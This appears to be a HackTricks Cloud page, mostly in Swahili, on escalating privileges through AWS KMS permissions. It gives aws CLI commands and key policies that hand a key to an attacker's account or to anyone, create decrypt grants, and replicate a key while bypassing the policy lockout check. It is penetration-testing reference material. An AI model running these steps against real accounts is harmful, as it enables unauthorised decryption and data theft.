HackTricks CloudAWS - KMS Privesc
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
KMS
Kwa taarifa zaidi kuhusu KMS angalia:
kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)
Kwa ruhusa hizi inawezekana kubadilisha ruhusa za ufunguo ili ziweze kutumika na maakaunti mengine au hata mtu yeyote:
aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json
policy.json:
{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<origin_account>:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow all use",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": ["kms:*"],
"Resource": "*"
}
]
}
kms:CreateGrant
Hii inaruhusu mhusika kutumia ufunguo wa KMS:
aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt
warning
Grant inaweza kuruhusu aina fulani tu za operesheni: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations
warning
Kumbuka kuwa inaweza kuchukua dakika chache kwa KMS kumruhusu mtumiaji kutumia key baada grant imetengenezwa. Mara muda huo unapopita, principal anaweza kutumia KMS key bila kuhitaji kubainisha chochote.
Hata hivyo, ikiwa inahitajika kutumia grant mara moja use a grant token (angalia code ifuatayo).
Kwa maelezo zaidi soma hii.
# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token
Kumbuka kwamba inawezekana kuorodhesha grant za keys kwa:
aws kms list-grants --key-id <value>
kms:CreateKey, kms:ReplicateKey
Kwa ruhusa hizi inawezekana kuiga kiufunguo cha KMS kilichoamilishwa kwa multi-region katika kanda tofauti na sera tofauti.
Kwa hivyo, mshambuliaji angeweza kutumia hili kupata privesc kwa ufikiaji wa kiufunguo na kuitumia
aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml
{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}
kms:Decrypt
Ruhusa hii inaruhusu kutumia ufunguo kufanya decrypt ya baadhi ya taarifa.
Kwa taarifa zaidi angalia:
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.